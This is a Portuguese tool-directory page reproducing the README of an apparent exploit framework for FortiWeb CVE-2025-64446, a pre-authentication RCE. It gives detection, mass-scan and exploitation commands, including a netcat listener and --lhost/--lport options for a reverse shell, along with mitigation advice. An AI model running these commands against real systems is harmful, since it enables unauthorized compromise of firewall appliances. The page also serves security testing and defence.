Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
FortiWeb-cve-2025-64446-RCE-exploit — Ferramenta de pesquisa de segurança para a vulnerabilidade CVE-2025-64446 do FortiWeb. Framework de exploração automatizada com registro avançado, métricas em tempo real, depuração de proxy e relatórios profissionais. Inclui lógica de repetição, multithreading e configurações personalizáveis. Apenas para testes de segurança autorizados. CVSS 9.8 Crítico. | Kitploit
Ferramentas/GitHubGitHub/cerberusmrxi/fortiweb-cve-2025-64446-rce-exploit
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubcerberusmrxi/fortiweb-cve-2025-64446-rce-exploit

FortiWeb-cve-2025-64446-RCE-exploit

Ver Repositório
12há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Ferramenta de pesquisa de segurança para a vulnerabilidade CVE-2025-64446 do FortiWeb. Framework de exploração automatizada com registro avançado, métricas em tempo real, depuração de proxy e relatórios profissionais. Inclui lógica de repetição, multithreading e configurações personalizáveis. Apenas para testes de segurança autorizados. CVSS 9.8 Crítico.

Compartilhar

FortiWeb CVE-2025-64446 RCE Exploit

Python License CVSS CVE Status Version

Framework profissional de pesquisa em segurança e avaliação de vulnerabilidades

Instalação · Início Rápido · Guia de Uso · Arquitetura · Referência de CLI · Aviso Legal e Ético


Visão geral

A FortiWeb Research Tool é um framework de avaliação em Python para detecção e análise autorizadas da CVE-2025-64446, um problema crítico de execução remota de código pré-autenticação que afeta appliances FortiWeb Web Application Firewall.

AtributoDetalhe
AutorSudeepa Wanigarathna
CVECVE-2025-64446
CVSS9.8 (Crítico)
ClasseBypass de autenticação + path traversal → upload arbitrário de arquivos → RCE
AfetadosBuilds anteriores a 7.6.7 / 7.8.7 / 8.0.2 (verifique no advisory oficial)
RemediaçãoAtualize para uma versão corrigida do FortiWeb
LinguagemPython 3.7+
Ponto de entradaexploit.py

Principais recursos

ModoFlag(s)Finalidade
Detecção--detect-onlyIndicadores de vulnerabilidade não exploratórios
Seguro / somente leitura--safe-modeIgnora etapas de exploração que alteram o sistema
Varredura em massa--targets + --scan-modeAvaliação paralela de múltiplos alvos
Exploração--target + --lhostCadeia controlada somente em laboratórios autorizados
Dry run--dry-runExercita o fluxo sem aplicar alterações
Relatórios--output-dirRelatórios de engajamento em JSON + HTML

Resumo da vulnerabilidade

CampoValor
ID da CVECVE-2025-64446
Pontuação CVSS9.8 (Crítico)
ImpactoComprometimento total do sistema quando explorado com sucesso
CorreçãoAtualize para 7.6.7, 7.8.7, 8.0.2 ou versões posteriores

Sempre confirme as versões afetadas/corrigidas junto ao PSIRT da Fortinet antes de definir o escopo do engajamento.


📸 Capturas de tela

UsoResultados da Varredura
PainelResultados da Varredura
Saída HTML
Saída do Terminal

Instalação

root@kitploit:~
git clone https://github.com/CerberusMrXi/FortiWeb-cve-2025-64446-RCE-exploit
cd FortiWeb-cve-2025-64446-RCE-exploit

python3 -m venv venv
source venv/bin/activate          # Linux / macOS
# venv\Scripts\activate           # Windows

pip install -r requirements.txt
python3 exploit.py --help

Dependências

PacoteFunção
requests, urllib3Cliente HTTP
rich, colorama, tqdmInterface de terminal e progresso
pyyamlCarregamento do config.yaml

Opcionais (dev): pytest, black, flake8, mypy, python-dotenv — consulte requirements.txt.


Início rápido

root@kitploit:~
# Vulnerability check only (recommended first)
python3 exploit.py --target https://192.168.1.100:8443 --detect-only

# Safe / read-only checks
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode

# Mass scanning
python3 exploit.py --targets targets.txt --scan-mode --threads 10

# Authorized exploitation (requires listener host)
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444

Nota: O modo de exploração exige --lhost. Use --detect-only ou --safe-mode quando não pretender executar a cadeia completa.


Guia de uso

Modo de detecção

root@kitploit:~
python3 exploit.py --target https://192.168.1.100:8443 --detect-only
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --verbose
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --timeout 30

A detecção avalia acessibilidade, indícios de versão, exposição da API, indicadores de path traversal, sinais de bypass de autenticação e acessibilidade do endpoint de upload. O risco é classificado como Crítico / Alto / Médio / Baixo com base nesses indicadores.

Varredura em massa

root@kitploit:~
cat > targets.txt << 'EOF'
https://192.168.1.100:8443
https://192.168.1.101:8443
https://192.168.1.102:8443
EOF

python3 exploit.py --targets targets.txt --scan-mode
python3 exploit.py --targets targets.txt --scan-mode --threads 20 --verbose
python3 exploit.py --targets targets.txt --scan-mode --output-dir ./reports

O ScannerManager executa workers FortiWebScanner por meio de um pool de threads, exibe uma tabela de resumo Rich e grava scan_report.json / scan_report.html.

Modo de exploração (somente laboratórios autorizados)

root@kitploit:~
# Start your listener first (example)
nc -lvnp 4444

python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --proxy http://127.0.0.1:8080
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --dry-run
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --user-agent "Research/1.0"

Arquivo de configuração

root@kitploit:~
# config.yaml
target: https://192.168.1.100:8443
lhost: 192.168.1.50
lport: 4444
timeout: 15
threads: 5
verify_ssl: false
verbose: true
proxy: http://127.0.0.1:8080
user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
output_dir: reports
log_dir: logs
detect_only: false
safe_mode: false
dry_run: false
root@kitploit:~
python3 exploit.py --config config.yaml
python3 exploit.py --config config.yaml --target https://10.0.0.1:8443 --lport 9999

As flags da CLI sobrescrevem os valores carregados do YAML.


Arquitetura

root@kitploit:~
exploit.py
├── ExploitConfig / ExploitResult / RequestMetrics   # dataclasses
├── LogManager                                       # exploit.log, errors.log, requests.log
├── Banner / StatusDisplay                           # Rich / colorama UI
├── FortiWebScanner                                  # detect-only checks (no exploit chain)
├── ScannerManager                                   # threaded multi-target scans + reports
├── FortiWebExploit                                  # single-target detect / exploit workflow
└── main()                                           # argparse + mode dispatch
ComponenteResponsabilidade
FortiWebScannerVerificações de acessibilidade, versão e indicadores de CVE
ScannerManagerVarreduras paralelas, relatórios consolidados JSON/HTML, tabela de resumo
FortiWebExploitSessão orientada por configuração, novas tentativas, métricas, relatórios, caminho de exploração opcional
LogManagerRegistro estruturado em arquivo + console colorido

Fluxo de alto nível para um único alvo:

  1. Configuração do banner / logging
  2. Sondagem de acessibilidade e versão
  3. Verificações de indicadores (ou cadeia completa quando não estiver nos modos detect/safe)
  4. Relatório JSON + HTML em reports/
  5. Limpeza quando aplicável

Recursos

Detecção

  • Verificações de indicadores de path traversal nos caminhos da API de gerenciamento
  • Verificações de sinais de bypass de autenticação
  • Sondagem de versão do FortiWeb em endpoints comuns de status/versão
  • Mapeamento da exposição de endpoints de API
  • Verificações de acessibilidade do endpoint de upload de arquivos
  • Pontuação de risco com base em indicadores combinados

Relatórios e observabilidade

  • Relatórios JSON e HTML com carimbo de data/hora
  • Métricas por requisição (status, latência, taxa de sucesso)
  • Logs separados: exploit.log, errors.log, requests.log

Controles operacionais

  • Varredura em massa multithread (--threads)
  • Suporte a proxy HTTP/HTTPS (ex.: Burp)
  • Novas tentativas com quantidade/intervalo configuráveis (padrões: 3 / 2s)
  • User-Agent personalizado, timeout, alternância de verificação SSL (--no-verify)
  • Saída colorida no console via Colorama + Rich

Saída gerada

root@kitploit:~
reports/
├── report_YYYYMMDD_HHMMSS.json
├── report_YYYYMMDD_HHMMSS.html
├── scan_report.json
└── scan_report.html

logs/
├── exploit.log
├── errors.log
└── requests.log

Exemplo de relatório JSON (detecção)

root@kitploit:~
{
  "metadata": {
    "tool_name": "FortiWeb Research Tool",
    "version": "1.0",
    "author": "Sudeepa Wanigarathna",
    "timestamp": "2026-07-31T00:02:17",
    "mode": "detect"
  },
  "target": {
    "url": "https://192.168.1.100:8443",
    "reachable": true,
    "version": "7.6.0",
    "vulnerable": true,
    "risk_level": "Critical"
  },
  "metrics": {
    "total_requests": 12,
    "average_response_time": 0.42,
    "success_rate": 0.91
  }
}

Referência de comando

root@kitploit:~
python3 exploit.py [OPTIONS]
OpçãoDescrição
--target URLURL base única do FortiWeb
--targets FILELista de alvos separados por quebras de linha
--lhost IPHost do listener (obrigatório para exploração)
--lport PORTPorta do listener (padrão: 4444)
--config FILEConfiguração YAML
--detect-onlySomente detectar; ignorar a cadeia de exploração
--scan-modeVarredura de múltiplos alvos (requer --targets)
--safe-modeSomente leitura; ignorar etapas que alteram o sistema
--dry-runExecução simulada sem aplicar alterações
--timeout SECTimeout de requisição (padrão: 15)
--threads NNúmero de workers de varredura (padrão: 5)
--proxy URLProxy HTTP
--user-agent STRUser-Agent personalizado
-v, --verboseLogging / console detalhado
--no-verifyDesativa a verificação de certificado TLS
--output-dir DIRDiretório de relatórios (padrão: reports)
--log-dir DIRDiretório de logs (padrão: logs)
-h, --helpMostra ajuda

Estrutura do projeto

root@kitploit:~
.
├── exploit.py           # Research tool (detect / scan / exploit)
├── config.yaml          # Example configuration
├── requirements.txt     # Python dependencies
├── reports/             # Generated JSON / HTML reports
├── logs/                # Runtime logs
├── LICENSE
├── SECURITY.md
├── .gitignore
└── README.md

Orientações de mitigação

  1. Atualize o FortiWeb para uma versão corrigida (7.6.7+, 7.8.7+, 8.0.2+ ou conforme as orientações atuais do PSIRT).
  2. Restrinja as interfaces de gerenciamento a redes confiáveis / jump hosts.
  3. Monitore a atividade de autenticação e da API de manutenção em busca de acessos anômalos.
  4. Rotacione credenciais e revise a integridade após qualquer exposição confirmada.
  5. Execute novamente --detect-only / --safe-mode após a correção para validar a remediação.

Aviso legal e ético

Esta ferramenta é exclusivamente para testes de segurança, pesquisa e educação autorizados.

  • Use apenas em sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar
  • Siga as regras de divulgação responsável e de programas de bug bounty
  • Não use para acesso não autorizado, danos ou atividades ilegais

Ao usar este software, você confirma que possui autorização, que não fará uso indevido e que assume total responsabilidade por suas ações. O autor não é responsável pelo uso indevido.

Consulte SECURITY.md para relato privado de vulnerabilidades relacionadas a este projeto.


Recursos

  • Fortinet PSIRT
  • Advisory: FG-IR-25-64446
  • Downloads de patches
  • NVD: CVE-2025-64446

Contribuição

  1. Faça um fork do repositório
  2. Crie uma branch: git checkout -b feature/your-change
  3. Faça commit com uma mensagem clara
  4. Envie (push) e abra um Pull Request

Valide as alterações somente em ambientes de laboratório autorizados e evite commitar dados de alvos reais, cookies ou credenciais.


Licença

Licença MIT — consulte LICENSE.

Copyright (c) 2026 Sudeepa Wanigarathna


Autor e suporte

AutorSudeepa Wanigarathna
IssuesIssues do GitHub para este repositório
SegurançaConsulte SECURITY.md · [email protected]

Somente pesquisa autorizada · FortiWeb CVE-2025-64446

Voltar ao topo

Baixar ferramenta